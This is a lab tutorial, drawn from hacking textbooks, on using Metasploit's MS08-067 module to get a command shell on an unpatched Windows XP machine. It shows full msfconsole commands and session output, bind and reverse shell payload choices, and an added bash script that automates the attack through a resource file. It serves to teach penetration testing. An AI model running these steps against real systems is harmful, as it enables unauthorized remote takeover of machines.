Basic Metasploit Usage:
Books used: Gray Hat Hacking, Hacking Exposed 6th edition
LAB Setup:
1. Unpatched Windows XP machine, the target.
2. Machine to launch Metasploit from, Windows or Linux.
Note*** :
Hackers may have access to an exploit months before a patch is released.
Also, since many people do not patch their machines regularly, an attacker
gets another window of opportunity long after the patch exists. Hackers reuse
the same old, well-known methods and usually go for the low-hanging fruit.
Step 1.
Target: Windows XP, unpatched
Vulnerability: MS08-067, a stack buffer overflow in the Server service's path
canonicalization code, reachable over SMB without authentication on Windows XP.
This vulnerability led to the Conficker superworm of late 2008–early 2009.
Goal: Get a remote command shell on the unpatched Windows XP Machine.
Step 2.
Install Metasploit on Linux or Windows.
Step 3. Commands
msf >
msf > search ms08-067
[*] Searching loaded modules for pattern 'ms08-067'...
Exploits
========
Name                          Rank   Description
----                          ----   -----------
windows/smb/ms08_067_netapi   great  Microsoft Server Service Relative Path Stack Corruption
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
(Notice that the prompt changes: you are now in "exploit mode", working inside
the selected module.) You can get back to the main console's original state by
issuing the back command:
msf exploit(ms08_067_netapi) > back
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
This exploit requires a target address, the port on which SMB (Server Message
Block) listens (445 by default), and the name of the named pipe through which
the vulnerable Server service function is reached. Only RHOST has no default,
so it is the one option we must set:
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.6
RHOST => 192.168.1.6
With the exploit module selected, we next need to set the payload. The payload is
the code that runs after the vulnerability is exploited; it is how you choose to
interact with the compromised machine once the vulnerability has been triggered
successfully. For this first example, let's use a payload that simply opens a
command shell listening on a TCP port:
msf exploit(ms08_067_netapi) > search "Windows Command Shell"
[*] Searching loaded modules for pattern 'Windows Command Shell'...
Compatible Payloads
===================
Name                                Rank    Description
----                                ----    -----------
windows/shell/bind_ipv6_tcp         normal  Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp         normal  Windows Command Shell, Bind TCP Stager (No NX Support)
windows/shell/bind_tcp              normal  Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp      normal  Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp      normal  Windows Command Shell, Reverse TCP Stager (No NX Support)
windows/shell/reverse_ord_tcp       normal  Windows Command Shell, Reverse Ordinal TCP Stager
windows/shell/reverse_tcp           normal  Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports  normal  Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns       normal  Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp              normal  Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp           normal  Windows Command Shell, Reverse TCP Inline
In typical gratuitous Metasploit style, there are 11 payloads that provide a
Windows command shell. Some open a listener on the target host ("bind"), some
cause the target to "phone home" to the attacking workstation ("reverse"), some
use IPv6, some set up the command shell in one network round trip ("inline"),
while others use multiple round trips ("staged"). One (reverse_tcp_dns) lets the
connect-back address be given as a DNS hostname instead of an IP address. This
Windows XP target virtual machine does not have a firewall enabled, so we'll use
the simple windows/shell/bind_tcp payload:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
If the target were running a firewall that blocks inbound connections, we might
instead choose a payload that causes the compromised workstation to connect back
to the attacker ("reverse"), such as windows/shell/reverse_tcp, which also needs
LHOST set to the attacker's address. With the bind payload selected, show options
now lists the payload's own options as well:
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.1.6      yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port
RHOST     192.168.1.6      no        The target address
By default, this payload opens a listener on TCP port 4444 on the target, and
Metasploit's bind handler then connects to it to give us the command shell.
Let's attempt the exploit:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!
It worked! We can verify the connection by issuing the netstat command from the
Windows XP machine's console, looking for an established connection on port 4444:
C:\>netstat -ano | findstr 4444 | findstr ESTABLISHED
TCP    192.168.1.6:4444    192.168.1.4:49623    ESTABLISHED    964
The last column is the PID of the process that owns the socket on the target;
tasklist /FI "PID eq 964" names it, which is also the first thing a defender
investigating an unexpected listener on 4444 would check.
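The whole sequence above, from selecting the module through choosing a bind or reverse shell (the firewall discussion before show options) to launching the exploit, can be scripted instead of typed at the msf prompt. The following is an added example, not code from this page or from the Metasploit project. It assumes a current msfconsole on PATH (which names the target option RHOSTS, where the older release shown above prints RHOST), nc for a port pre-check, and uses the page's lab addresses 192.168.1.6 (target) and 192.168.1.4 (attacker) as placeholders.

```shell
#!/usr/bin/env bash
# Added example: drive the MS08-067 walkthrough above from a script instead of
# the interactive msf prompt, by generating a msfconsole resource file.
# Assumptions: a current msfconsole on PATH (its target option is RHOSTS; the
# older release shown on the page calls it RHOST) and nc for the pre-check.
# The addresses used are the lab values from the page, as placeholders.
set -eu

# Emit the resource script for one target to stdout.
#   $1 target address (RHOSTS)
#   $2 "bind"    -> windows/shell/bind_tcp: the target listens on LPORT and
#                   Metasploit's bind handler connects in (no-firewall case)
#      "reverse" -> windows/shell/reverse_tcp: the target connects back to
#                   LHOST:LPORT, so inbound filtering on the target is irrelevant
#   $3 attacker address (LHOST): required for reverse, ignored for bind
#   $4 listener port (LPORT), default 4444 as in the show options output above
make_rc() {
  local rhost="$1" mode="$2" lhost="${3:-}" lport="${4:-4444}"
  local payload
  case "$mode" in
    bind)    payload="windows/shell/bind_tcp" ;;
    reverse) payload="windows/shell/reverse_tcp" ;;
    *) echo "make_rc: mode must be 'bind' or 'reverse', got '$mode'" >&2; return 1 ;;
  esac
  # A reverse stager with no LHOST would be fired with a useless connect-back
  # address, so refuse early rather than crash the Server service for nothing.
  if [ "$mode" = reverse ] && [ -z "$lhost" ]; then
    echo "make_rc: reverse payload needs the attacker address as LHOST" >&2
    return 1
  fi
  printf '%s\n' \
    "use exploit/windows/smb/ms08_067_netapi" \
    "set RHOSTS $rhost" \
    "set PAYLOAD $payload" \
    "set LPORT $lport"
  # RPORT 445 and SMBPIPE BROWSER are left at their defaults, as on the page.
  if [ "$mode" = reverse ]; then
    printf '%s\n' "set LHOST $lhost"
  fi
  # -z: wait for the exploit to finish but do not drop into the session, so the
  # listing that follows runs once the session exists; attach with sessions -i.
  printf '%s\n' "exploit -z" "sessions -l"
}

# Cheap pre-check: is SMB reachable at all? Saves a pointless exploit attempt
# when the address is wrong or a firewall on the target blocks tcp/445.
smb_reachable() {
  nc -z -w 3 "$1" 445 >/dev/null 2>&1
}

# Write the script to a temp file and hand it to msfconsole
# (-q: no banner, -r: run resource file). Same arguments as make_rc.
run_rc() {
  local rc
  if ! smb_reachable "$1"; then
    echo "run_rc: tcp/445 on $1 not reachable, aborting" >&2
    return 1
  fi
  rc="$(mktemp)"
  make_rc "$@" > "$rc"
  msfconsole -q -r "$rc"
  rm -f "$rc"
}

# With arguments, run the attack; with none, just print the bind-shell script
# for the page's lab target (192.168.1.6) so it can be inspected.
if [ "$#" -gt 0 ]; then
  run_rc "$@"
else
  make_rc 192.168.1.6 bind
fi
```

Saved as, say, ms08_067.sh (a hypothetical name), running it with no arguments prints the resource script for the bind case; `./ms08_067.sh 192.168.1.6 reverse 192.168.1.4` generates the firewall-friendly variant and runs it. When `exploit -z` returns, `sessions -i 1` attaches to the shell that the interactive session above dropped you into directly.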